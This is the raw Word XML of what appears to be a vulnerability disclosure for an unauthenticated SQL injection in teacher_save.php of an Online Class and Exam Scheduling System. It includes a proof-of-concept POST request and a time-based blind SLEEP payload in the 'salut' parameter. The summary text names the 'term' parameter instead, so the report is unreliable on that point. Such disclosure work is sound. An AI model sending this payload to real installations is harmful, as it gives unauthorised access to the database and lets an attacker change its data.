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9542E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>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-teacher_save.php</w:t>
      </w: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564D95F8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/pages/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>teacher_save.php</w:t>
      </w:r>
    </w:p>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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>teacher_save.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>' file of the '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>' project. This issue occurs because an attacker injects malicious code from the parameter "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>term</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>"and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67960" cy="2143125"/>
            <wp:effectExtent l="0" t="0" r="508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7960" cy="2143125"/>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055BAA40">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A critical SQL injection vulnerability was found in the Online Class and Exam Scheduling System due to insufficient user input validation of the "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>term</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" parameter, allowing an attacker to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial action is required to secure the system and protect data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6652DE07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>No login verification required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D90A9">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Vulnerability details and POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B6B7FE">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/scheduling/pages/teacher_save.php HTTP/</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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B47623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172.20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10.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9C072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93</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBDFFB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260AA88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324F8DF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1E78C29C">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//172.20.10.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B154F9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6DF964F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65E8ACF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6F0C21F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//172.20.10.3/scheduling/pages/teacher.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561D08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670038E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PHPSESSID=cqap7l86hda34ue59p29aav091  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDF8C1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5AF8A8FB">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636CA40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example1_length=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>&amp;salut=Dr&amp;first=ss&amp;last=ss&amp;rank=</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&amp;dept=</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&amp;designation=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>66</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>&amp;status=admin&amp;save=  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318E94CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="2628265"/>
            <wp:effectExtent l="0" t="0" r="508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7960" cy="2628265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E0E88C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Vulnerability type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E52C19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>time-based blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FAEB7A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Vulnerability location:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D688EC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>salut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>' parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCCDE11">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300A36D5">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salut (POST)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB137C">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6996A986">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AND time-based blind (query SLEEP)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E88A11">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example1_length=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>&amp;salut=Dr'+(SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>0x6c536c76</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t> WHERE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>3007</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3007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t> AND (SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>4977</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)))cwax))+'&amp;first=ss&amp;last=ss&amp;rank=</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&amp;dept=</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&amp;designation=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>66</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>&amp;status=admin&amp;save=  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F5ACEB"/>
    <w:p w14:paraId="5919CE86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2883535"/>
            <wp:effectExtent l="0" t="0" r="254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70500" cy="2883535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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68595" cy="4117975"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1206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68595" cy="4117975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5908ECF3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Suggested repair</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>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4844FB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4844F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2087F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F02087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5E22C45"/>
    <w:rsid w:val="085C513D"/>
    <w:rsid w:val="08C616D3"/>
    <w:rsid w:val="0958078A"/>
    <w:rsid w:val="09D54395"/>
    <w:rsid w:val="0AEF0DDC"/>
    <w:rsid w:val="0B4E1B8B"/>
    <w:rsid w:val="0B84410E"/>
    <w:rsid w:val="103D7E98"/>
    <w:rsid w:val="115A162D"/>
    <w:rsid w:val="11652C63"/>
    <w:rsid w:val="1292521C"/>
    <w:rsid w:val="13344EDC"/>
    <w:rsid w:val="13931798"/>
    <w:rsid w:val="13F871E9"/>
    <w:rsid w:val="148443FC"/>
    <w:rsid w:val="15BE1225"/>
    <w:rsid w:val="16AD0916"/>
    <w:rsid w:val="174E6388"/>
    <w:rsid w:val="185B0A82"/>
    <w:rsid w:val="191266CD"/>
    <w:rsid w:val="1C511779"/>
    <w:rsid w:val="1F841EC1"/>
    <w:rsid w:val="21494A03"/>
    <w:rsid w:val="21546861"/>
    <w:rsid w:val="21894CDA"/>
    <w:rsid w:val="23CA7E5D"/>
    <w:rsid w:val="24B85C79"/>
    <w:rsid w:val="24CA1507"/>
    <w:rsid w:val="2607591B"/>
    <w:rsid w:val="27C92CE4"/>
    <w:rsid w:val="27F2374E"/>
    <w:rsid w:val="28BB402D"/>
    <w:rsid w:val="29651B05"/>
    <w:rsid w:val="29711886"/>
    <w:rsid w:val="2B821C11"/>
    <w:rsid w:val="2D214FC0"/>
    <w:rsid w:val="30954A86"/>
    <w:rsid w:val="30BA2637"/>
    <w:rsid w:val="313C778B"/>
    <w:rsid w:val="320457AA"/>
    <w:rsid w:val="330F2F66"/>
    <w:rsid w:val="334A2505"/>
    <w:rsid w:val="34B048AC"/>
    <w:rsid w:val="37E01F7D"/>
    <w:rsid w:val="37EC5FE6"/>
    <w:rsid w:val="390078DA"/>
    <w:rsid w:val="3A805D8E"/>
    <w:rsid w:val="3B3A381D"/>
    <w:rsid w:val="3BA219D2"/>
    <w:rsid w:val="3BC268BC"/>
    <w:rsid w:val="3C9E05CE"/>
    <w:rsid w:val="3E835F80"/>
    <w:rsid w:val="404D5D77"/>
    <w:rsid w:val="43263458"/>
    <w:rsid w:val="439D37F0"/>
    <w:rsid w:val="46190E27"/>
    <w:rsid w:val="46794D72"/>
    <w:rsid w:val="46F92614"/>
    <w:rsid w:val="471C535D"/>
    <w:rsid w:val="481E5607"/>
    <w:rsid w:val="49125B3D"/>
    <w:rsid w:val="492B154C"/>
    <w:rsid w:val="49961940"/>
    <w:rsid w:val="4AD978D5"/>
    <w:rsid w:val="4DDE00FE"/>
    <w:rsid w:val="4EFF09F2"/>
    <w:rsid w:val="512473D9"/>
    <w:rsid w:val="51BC06EC"/>
    <w:rsid w:val="531D273D"/>
    <w:rsid w:val="549411C4"/>
    <w:rsid w:val="56577DDA"/>
    <w:rsid w:val="569C7080"/>
    <w:rsid w:val="596158D8"/>
    <w:rsid w:val="5B1B7148"/>
    <w:rsid w:val="62774F17"/>
    <w:rsid w:val="64D4441E"/>
    <w:rsid w:val="66336607"/>
    <w:rsid w:val="66AF173A"/>
    <w:rsid w:val="67D0433B"/>
    <w:rsid w:val="68247009"/>
    <w:rsid w:val="686142B9"/>
    <w:rsid w:val="69E8167C"/>
    <w:rsid w:val="6E586DB6"/>
    <w:rsid w:val="6E5D131B"/>
    <w:rsid w:val="73BE077C"/>
    <w:rsid w:val="741C3B1A"/>
    <w:rsid w:val="74377C4A"/>
    <w:rsid w:val="745E5F99"/>
    <w:rsid w:val="75BC0E83"/>
    <w:rsid w:val="77925C41"/>
    <w:rsid w:val="7DBC3788"/>
    <w:rsid w:val="7E284A8B"/>
    <w:rsid w:val="7F11162F"/>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436</Words>
  <Characters>3145</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3575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2024-12-09T07:19:13Z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